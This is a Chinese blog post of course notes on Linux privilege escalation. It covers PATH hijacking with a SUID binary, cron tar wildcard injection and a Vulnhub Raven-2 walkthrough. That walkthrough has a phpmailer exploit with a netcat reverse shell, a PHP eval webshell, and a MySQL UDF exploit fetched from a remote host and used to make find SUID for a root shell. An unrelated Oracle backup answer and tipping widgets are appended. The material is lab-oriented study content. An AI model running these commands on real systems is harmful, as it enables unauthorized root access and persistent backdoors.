权限提升-Linux定时任务&环境变量&数据库

#案例1.Linux提权本地环境变量安全-本地
配合SUID进行环境变量提权-本地用户环境
手写调用文件-编译-复制文件-增加环境变量-执行触发

gcc demo.c -o shell
cp /bin/sh /tmp/ps
export PATH=/tmp:$PATH
./shell
id


demo.c

#include<unistd.h>
void main()
{
    setuid(0);
    setgid(0);
    system("ps");
}

image.png

  1. 路径问题
    1. 利用计划任务指向的文件的相对路径解析问题
cat /ect/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/xiaodi/test.sh
chmod +x /home/xiaodi/test.sh
/tmp/bash
  1. 命令问题
    1. 利用通配符配合命令参数自定义命令实现提权
    2. 不安全定时任务备份命令:
cd /home/undead/script;tar czf /tmp/backup.tar.gz *	#backup.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/undead/script/test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
cd /tmp
./bash -p

https://www.cnblogs.com/manong–/p/8012324.html
test.sh

cp /bin/bash /tmp/bash; chmod +s /tmp/bash

image.png

  1. 权限问题
    1. 利用不安全的权限分配操作导致的定时文件覆盖
    2. chmod 777 775 等 所有者 组 其他成员说明

#案例3.Linux提权数据库MYSQL_UDF-Vulnhub
https://www.vulnhub.com/entry/raven-2,269/

Vulnhub 某靶机-探针 IP 及端口-利用漏洞获取 web 权限-信息收集-查看数据库配置文件-利用 Mysql 提
权 Linux(Mysql 版本区别同 Windows)
#探针 IP 及端口
nmap 192.168.76.0/24
#利用 phpmailer 漏洞进行修改并反弹
python D:/Myproject/40974.py
nc -lvvp 4444
#写入后门利用菜刀连接方便操作
echo '<?php eval($_POST[x]);?>' >1.php
上传信息收集脚本进行提权信息收集
./LinEnum.sh
翻阅数据库配置文件获取 root 密码
#利用 Mysql 提权 searchsploit
下载 mysql udf poc 进行编译
wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so 1518.so
下载 1518 到目标服务器
wget https://xx.xx.xx.xx/1518.so
进入数据库进行 UDF 导出
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
创建 do_system 函数调用
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
#配合使用 find 调用执行
touch xiaodi
find xiaodi –exec "whoami" \;
find xiaodi –exec "/bin/sh" \;
id

#案例4.Linux提权提升简单总结归类-参考PDF

  1. 提权环境,信息收集(SUID,定时任务,可能漏掉,第三方服务应用等)
  2. 最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本)
  3. 本地searchsploit脚本及远程exploitdb站点搜索说明(简要使用)
  4. 其他提权方法:密码复用,guid,sudo等说明(运气,同理,鸡肋等)

SUDO参考说明:https://www.freebuf.com/vuls/217089.html
**
考说明:https://www.freebuf.com/vuls/217089.html
**

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
回答: 在Linux系统中手动备份Oracle数据库,可以按照以下步骤进行操作。首先,登录到数据库的编辑模式,使用以下命令登录到SQL*Plus: &quot;sqlplus / as sysdba&quot;。然后,修改当前用户的权限,使用以下命令授予sysdba权限和imp_full_database权限给用户: &quot;grant sysdba to 用户名; grant imp_full_database to 用户名;&quot;。\[1\] 接下来,设置环境变量。因为crontab定时调用时,不会使用oracle用户的环境变量,所以需要将环境变量导入。可以在备份脚本中添加以下代码来设置环境变量: ``` export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1 export PATH=$ORACLE_HOME/bin:$PATH export LD_LIBRARY_PATH=$ORACLE_HOME/lib export NLS_LANG=AMERICAN_AMERICA.AL32UTF8 ``` 其中,ORACLE_HOME需要根据实际安装路径进行修改。\[2\] 然后,创建一个备份脚本。在脚本中,可以使用当前日期作为导出文件的文件名,并将导出的文件和日志文件打包成一个zip包,并删除这两个文件。以下是一个备份脚本的示例: ``` #!/bin/bash export ORACLE_SID=数据库实例名 export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1 export PATH=$ORACLE_HOME/bin:$PATH export LD_LIBRARY_PATH=$ORACLE_HOME/lib export NLS_LANG=AMERICAN_AMERICA.AL32UTF8 export BACKUP_DIR=/backup export DATE=$(date +%Y%m%d) export DUMP_FILE=$BACKUP_DIR/$DATE.dmp export LOG_FILE=$BACKUP_DIR/$DATE.log export ZIP_FILE=$BACKUP_DIR/$DATE.zip expdp 用户名/密码@数据库实例名 directory=DATA_PUMP_DIR dumpfile=$DUMP_FILE logfile=$LOG_FILE zip $ZIP_FILE $DUMP_FILE $LOG_FILE rm $DUMP_FILE $LOG_FILE ``` 其中,需要根据实际情况修改ORACLE_SID、ORACLE_HOME、BACKUP_DIR、用户名、密码和数据库实例名等参数。\[2\] 最后,可以将备份脚本设置为定时任务,以实现自动备份。可以使用crontab命令来设置定时任务,例如每天凌晨3点执行备份脚本: ``` crontab -e ``` 然后,在打开的编辑器中添加以下行: ``` 0 3 * * * /path/to/backup_script.sh ``` 保存并退出编辑器即可。这样,每天凌晨3点,备份脚本就会自动执行。\[2\] #### 引用[.reference_title] - *1* [Linux下备份oracle数据库](https://blog.csdn.net/li951383937/article/details/52475982)[target=&quot;_blank&quot; data-report-click={&quot;spm&quot;:&quot;1018.2226.3001.9630&quot;,&quot;extra&quot;:{&quot;utm_source&quot;:&quot;vip_chatgpt_common_search_pc_result&quot;,&quot;utm_medium&quot;:&quot;distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt&quot;}} ] [.reference_item] - *2* [怎样在Linux系统中备份Oracle数据库](https://blog.csdn.net/weixin_39658318/article/details/116388866)[target=&quot;_blank&quot; data-report-click={&quot;spm&quot;:&quot;1018.2226.3001.9630&quot;,&quot;extra&quot;:{&quot;utm_source&quot;:&quot;vip_chatgpt_common_search_pc_result&quot;,&quot;utm_medium&quot;:&quot;distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt&quot;}} ] [.reference_item] - *3* [linux环境下如何对oracle数据库进行整库备份](https://blog.csdn.net/weixin_42134097/article/details/116318942)[target=&quot;_blank&quot; data-report-click={&quot;spm&quot;:&quot;1018.2226.3001.9630&quot;,&quot;extra&quot;:{&quot;utm_source&quot;:&quot;vip_chatgpt_common_search_pc_result&quot;,&quot;utm_medium&quot;:&quot;distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt&quot;}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雨雾_雨屋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值